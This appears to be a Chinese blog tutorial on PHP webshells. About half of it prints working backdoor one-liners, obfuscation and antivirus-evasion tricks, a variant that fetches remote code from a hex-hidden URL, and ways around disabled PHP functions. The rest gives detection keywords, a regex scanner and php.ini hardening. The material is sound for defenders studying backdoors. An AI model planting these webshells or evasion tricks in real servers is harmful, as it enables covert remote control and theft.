基于PHP的應用面臨着各種各樣的攻擊:
- XSS:對PHP的Web應用而言,跨站腳本是一個易受攻擊的點。攻擊者可以利用它盜取使用者資訊。你可以配置Apache,或是寫更安全的PHP代碼(驗證所有使用者輸入)來防範XSS攻擊
- SQL注入:這是PHP應用中,資料庫層的易受攻擊點。防範方式同上。常用的方法是,使用mysql_real_escape_string()對參數進行轉義,而後進行SQL查詢。
- 檔案上傳:它可以讓通路者在伺服器上放置(即上傳)檔案。這會造成例如,删除伺服器檔案、資料庫,擷取使用者資訊等一系列問題。你可以使用PHP來禁止檔案上傳,或編寫更安全的代碼(如檢驗使用者輸入,隻允許上傳png、gif這些圖檔格式)
- 包含本地與遠端檔案:攻擊者可以使遠端伺服器打開檔案,運作任何PHP代碼,然後上傳或删除檔案,安裝後門。可以通過取消遠端檔案執行的設定來防範
- eval/assert:這個函數可以使一段字元串如同PHP代碼一樣執行。它通常被攻擊者用于在伺服器上隐藏代碼和工具。通過配置PHP,取消eval等函數調用來實作
- Sea-surt Attack(Cross-site request forgery,CSRF。跨站請求僞造):這種攻擊會使終端使用者在目前賬号下執行非指定行為。這會危害終端使用者的資料與操作安全。如果目标終端使用者的賬号用于管理者權限,整個Web應用都會收到威脅。
這裡介紹上述加粗的幾種攻擊的方法
一、各種webshell
随着業務量的增大,越來越多的黑客來攻擊掃描,網站安全性日益重要,一不留神就被黑客控制了伺服器,最常見的方式就是通過POST請求來上傳木馬檔案,進而達到可以執行任意指令,如果被控制就大事不妙了
是以還是要正視伺服器的安全
最流行的一種後門叫做一句話木馬,其形式如下所示:
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST["cmd"]);
system($cmd);
echo "</pre>$cmd<pre>";
die;
}
?> 這種容易被安全軟體檢測出來。為了增強隐蔽性,出現了各種一句話木馬的變形,通過各種函數來僞裝,這裡不得不吐槽PHP弱類型對于安全來說是緻命的
a、使用str_replace函數
<?php $a =str_replace(x,"","axsxxsxexrxxt");$a($_POST["code"]); ?>
//說明:請求參數 ?code=fputs(fopen(base64_decode(J2MucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg=="))
最終執行指令<?php assert(fputs(fopen('c.php',w),"<?php @eval($_POST[a]);?>"))?>
b、使用str_rot13函數
<?php ($code = $_POST['code']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($code)', 'add'); ?>
//說明:首先,将eval函數用str_rot13('riny')隐藏。然後,利用 e 修飾符,在preg_replace完成字元串替換後,使得引擎将結果字元串作為php代碼使用eval方式進行評估并将傳回值作為最終參與替換的字元串。
c、使用include函數
<?php $filename=$_GET['code'];include ($filename); ?>
//由于include方法可以直接編譯任何格式的檔案為php格式運作,是以可以上傳一個txt格式的php檔案,将真正的後門寫在文本當中。
d、使用pack函數
<?php if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(sprintf('%s? %s',pack(“H*”,'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace(“~(.*)~ies”,gzuncompress($_SESSION['api']),null);
?> e、使用session
<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
f、隐藏在html頁面
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
g、使用assert函數
<?php assert($_POST[sb]);?>
或者
<?php
$item['wind'] = 'assert';
$array[] = $item;
$array[0]['wind']($_POST['iixosmse']); h、使用copy函數複制檔案
<?php
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); 二、代碼混淆
<?php
@$_++; // $_ = 1
$__=("#"^"|"); // $__ = _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?> <?php
$penh="sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30=";
$kthe="JGEpPjgiMpeyRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn";
$ftdf = str_replace("w","","stwrw_wrwepwlwawcwe");
$wmmi="X3JlcgiGxhY2UgioYXgiJyYXkoJy9bXlx3PVgixzXS8nLCgicvXHMvJyksIGFycmF5KCcnLCcrgiJyk";
$zrmt="JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo";
$smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe");
$jgfi = $ftdf("l","","lclrlelaltel_functlilon");
$rdwm = $jgfi('', $smgv($ftdf("gi", "", $zrmt.$kthe.$wmmi.$penh))); $rdwm();
?>
可以使用weevely工具來生成,代碼僞裝避開各種主流的防毒軟體
PHP後門生成工具weevely
weevely是一款針對PHP的webshell的自由軟體,可用于模拟一個類似于telnet的連接配接shell,weevely通常用于web程式的漏洞利用,隐藏後門或者使用類似telnet的方式來代替web 頁面式的管理,weevely生成的伺服器端php代碼是經過了base64編碼的,是以可以騙過主流的防毒軟體和IDS,上傳伺服器端代碼後通常可以通過weevely直接運作。
weevely所生成的PHP後門所使用的方法是現在比較主流的base64加密結合字元串變形技術,後門中所使用的函數均是常用的字元串處理函數,被作為檢查規則的eval,system等函數都不會直接出現在代碼中,進而可以緻使後門檔案繞過後門查找工具的檢查。使用暗組的Web後門清除工具進行掃描,結果顯示該檔案無任何威脅。
更常用的混淆視聽的方法:(這種是伺服器層面的混淆)
- 修改檔案時間
- 改名融入上傳後所在檔案夾,讓人無法直覺看出檔案異常
- 檔案大小的僞裝處理(至少看起大小像個正常腳本)
- 選好藏身路徑并盡量少的通路
- 畸形目錄%20
三、如果繞過配置檔案
一般的伺服器管理者會把 system、exec等危險函數禁用的,那麼如何繞過呢?
1、使用反射
相關内容可參考:http://cn2.php.net/manual/en/reflectionfunction.invokeargs.php。
<?php
$func = new ReflectionFunction("system");
echo $func->invokeArgs(array("$_GET[c]"));
?> 2、使用callback
php提供的另外一種可間接調用函數的方法是callback. 這裡使用了ob_start.具體說明可參考:http://www.php.net/manual/en/function.ob-start.php
<?php
$cb= 'system';
ob_start($cb);
echo $_GET[c];
ob_end_flush();
?> php中支援callback的函數還有很多,比如 array_map,array_filter, array_reduce,usort(),uksort(),array_walk() 等
四、安全人員應該怎麼做
1、如何查找
直覺尋找方式也有很多
- 通過檔案名/修改時間/大小,檔案備份比對發現異常(SVN/Git對比,檢視檔案是否被修改)
- 通過WEBSHELL後門掃描腳本發現,如Scanbackdoor.php/Pecker/shelldetect.php/(zhujiweishi )
- 通過access.log通路日志分析
下面是360 zhujiweishi ,在linux伺服器上非常簡單好用
通過常見的關鍵詞如(可以使用find 和 grep 等指令結合起來搜尋代碼中是否包含以下檔案)
- 系統指令執行: system, passthru, shell_exec, exec, popen, proc_open
- 代碼執行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
- 檔案包含: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
通過簡單的python腳本
#!/usr/bin/env python
# encoding: utf-8
import os,sys
import re
import hashlib
import time
rulelist = [
'(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0,10}\(\s{0,10}\$_(GET|POST|REQUEST)\[.{0,15}\]\))',
'((eval|assert)(\s|\n)*\((\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
'(eval(\s|\n)*\(base64_decode(\s|\n)*\((.|\n){1,200})',
'(function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|passthru)+[\'|\"]\s*\))',
'((exec|shell\_exec|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*\))',
'(\$(\w+)\s*\(\s.chr\(\d+\)\))',
'(\$(\w+)\s*\$\{(.*)\})',
'(\$(\w+)\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\s*\))',
'(\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\(\s*\$(.*)\))',
'(\$\_\=(.*)\$\_)',
'(\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\))',
'(new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\))',
'(echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\))',
'((fopen|fwrite|fputs|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\](.*)\))',
'(\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES)+\[(.*)\]\[(.*)\]\s*\))',
'(\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*\$(\w+)\s*\))',
'((include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+)\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js)+[\'|\"]\s*\))',
'(eval\s*\(\s*\(\s*\$\$(\w+))',
'((eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk)+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\))',
'(preg\_replace\s*\((.*)\(base64\_decode\(\$)'
]
def scan(path):
print(' 可疑檔案 ')
print('*'*30)
for root,dirs,files in os.walk(path):
for filespath in files:
if os.path.getsize(os.path.join(root,filespath))<1024000:
file= open(os.path.join(root,filespath))
filestr = file.read()
file.close()
for rule in rulelist:
result = re.compile(rule).findall(filestr)
if result:
print '檔案:'+os.path.join(root,filespath )
print '惡意代碼:'+str(result[0][0:200])
print ('最後修改時間:'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(os.path.getmtime(os.path.join(root,filespath)))))
print '\n\n'
break
def md5sum(md5_file):
m = hashlib.md5()
fp = open(md5_file)
m.update(fp.read())
return m.hexdigest()
fp.close()
if md5sum('/etc/issue') == '3e3c7c4194b12af573ab11c16990c477':
if md5sum('/usr/sbin/sshd') == 'abf7a90c36705ef679298a44af80b10b':
pass
else:
print('*'*40)
print "\033[31m sshd被修改,疑似留有後門\033[m"
print('*'*40)
time.sleep(5)
if md5sum('/etc/issue') == '6c9222ee501323045d85545853ebea55':
if md5sum('/usr/sbin/sshd') == '4bbf2b12d6b7f234fa01b23dc9822838':
pass
else:
print('*'*40)
print "\033[31m sshd被修改,疑似留有後門\033[m"
print('*'*40)
time.sleep(5)
if __name__=='__main__':
if len(sys.argv)!=2:
print '參數錯誤'
print "\t按惡意代碼查找:"+sys.argv[0]+'目錄名'
if os.path.lexists(sys.argv[1]) == False:
print "目錄不存在"
exit()
print ('\n\n開始查找:'+sys.argv[1])
if len(sys.argv) ==2:
scan(sys.argv[1])
else:
exit()
2、如何防範
php.ini 設定
- disable_functions =phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,get_current_user,leak,putenv,popen,opendir
- 設定“safe_mode”為“on”
- 禁止“open_basedir” 可以禁止指定目錄之外的檔案操作
- expose_php設為off 這樣php不會在http檔案頭中洩露資訊
- 設定“allow_url_fopen”為“off” 可禁止遠端檔案功能
- log_errors”設為“on” 錯誤日志開啟
php編碼方面
- 所有使用者送出的資訊 post get 或是其他形式送出的資料 都要單獨寫個過濾函數處理一遍,養成習慣(intval,strip_tags,mysql_real_escape_string)
- 經常檢查有沒有一句話木馬 eval($_POST[ 全站搜尋php代碼有沒有這樣的源代碼
- 檔案要命名規範 至少讓自己可以一目了然,哪些php檔案名字有問題
- 如用開源代碼,有更新檔出來的話,盡快打上更新檔
- 如果攻擊者拿到了伺服器的最高權限,有可能通過修改伺服器的配置檔案php.ini來達到他們隐藏後門的目的,前幾年比較流行。原理如下:php.ini 裡面的這兩個配置項:auto_prepend_file ,auto_append_file 可以讓php解析前,自己加點東西進去 Automatically add files before or after any PHP document,如果被配置了eval()函數的後門 那就很陰險了,php檔案代碼裡面查不出,隻會在php解析前包含eval()函數進來 并且因為是全局的 是以所有php頁面都是後門!是以要先确認auto_prepend_file ,auto_append_file沒被配置成其他東西,才進行第3點的源代碼檢查。
伺服器配置
配置的時候盡量使用最小權限,不要寫入或者執行的目錄不能給相應的權限
nginx或者apache配置的時候,不能通路的目錄一定要配置為deny
待續。。。
參考文章
https://github.com/chenpingzhao/php-webshells
http://blog.csdn.net/miltonzhong/article/details/9714367
http://blog.jobbole.com/53821/
- 作者:踏雪無痕
- 出處:http://www.cnblogs.com/chenpingzhao/
- 本文版權歸作者和部落格園共有,如需轉載,請聯系 pingzhao1990#163.com
![Apache配置SSLApache配置SSL[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)